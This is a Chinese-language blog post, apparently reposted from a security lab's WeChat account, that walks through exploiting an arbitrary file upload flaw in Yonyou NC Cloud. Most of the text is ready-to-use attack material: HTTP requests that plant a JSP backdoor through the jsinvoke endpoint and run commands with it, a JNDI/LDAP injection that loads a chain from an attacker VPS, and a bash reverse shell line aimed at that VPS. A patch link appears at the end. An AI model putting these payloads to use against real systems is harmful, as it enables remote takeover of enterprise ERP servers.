网安引领时代,弥天点亮未来
用友NC产品是面向集团企业的世界级高端管理软件,市场占有率在同类产品中已经达到亚太第一,已在8000家集团企业中应用,国内用户涵盖大多数关键基础设施运营单位。用友NC综合利用最新的互联网技术、云计算技术、移动应用技术等,通过构建大企业私有云来全面满足集团企业管理、全产业链管控和电子商务运营,
用友NC-Cloud是用友网络科技公司推出的一款面向中小企业的云服务产品。该产品整合了用友各类管理软件如ERP、CRM、OA等,实现了这些软件的云化部署。用友NC-Cloud存在任意文件上传漏洞,通过uapjs(jsinvoke)利用漏洞可非法上传后后门程序。该漏洞利用难度低,可导致远程命令执行,建议尽快修复。
NC63、NC633、NC65、NC Cloud1903、NC Cloud1909、NC Cloud2005、NC Cloud2105、NC Cloud2111、YonBIP高级版2207
1.访问漏洞环境
2.对漏洞进行复现
Poc(POST)
POST /uapjs/jsinvoke/?action=invoke HTTP/1.1Host: 127.0.0.1Connection: Keep-AliveContent-Length: 253Content-Type: application/x-www-form-urlencoded{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/302.jsp"]}
POST请求,响应存在漏洞
命令执行操作(ipconfig)
POST /302.jsp?error=bsh.Interpreter HTTP/1.1Host: 127.0.0.1Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Accept-Language: zh-CN,zh;q=0.9Cookie: cookiets=1681785470496; JSESSIONID=33989F450B1EA57D4D3ED07A343770FF.serverIf-None-Match: W/"1571-1589211696000"If-Modified-Since: Mon, 11 May 2020 15:41:36 GMTContent-Type: application/x-www-form-urlencodedContent-Length: 98cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("ipconfig").getInputStream())
3.反弹shell参考这篇文章。
https://mp.weixin.qq.com/s/Qgoo8OdJH4fUtreqdXR-3Q
利用JNDI注入工具TomcatEcho回显链
java -jar JNDIExploit-1.4-SNAPSHOT.jar -u
使用ladp加载利用链
POST /uapjs/jsinvoke/?action=invoke HTTP/1.1Host: 127.138.100.158:8080Connection: Keep-AliveContent-Length: 253Content-Type: application/x-www-form-urlencoded{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://VPSip:1389/TomcatBypass/TomcatEcho')}","webapps/nc_web/301.jsp"]}
vps开始ladp监听
bash反弹shell
GET /301.jsp HTTP/1.1Host: 127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0cmd: bash -i >& /dev/tcp/vps/12388 0>&1
vps监听12388端口获取反弹shell。
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://dsp.yonyou.com/patchcenter/patchdetail/11231678267338650434/0/2弥天简介
学海浩茫,予以风动,必降弥天之润!弥天弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。
口号 网安引领时代,弥天点亮未来
知识分享完了
喜欢别忘了关注我们哦~
学海浩茫,
弥 天
安全实验室
原文始发于微信公众号(弥天安全实验室):用友NC Cloud远程代码执行漏洞【反弹shell】
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论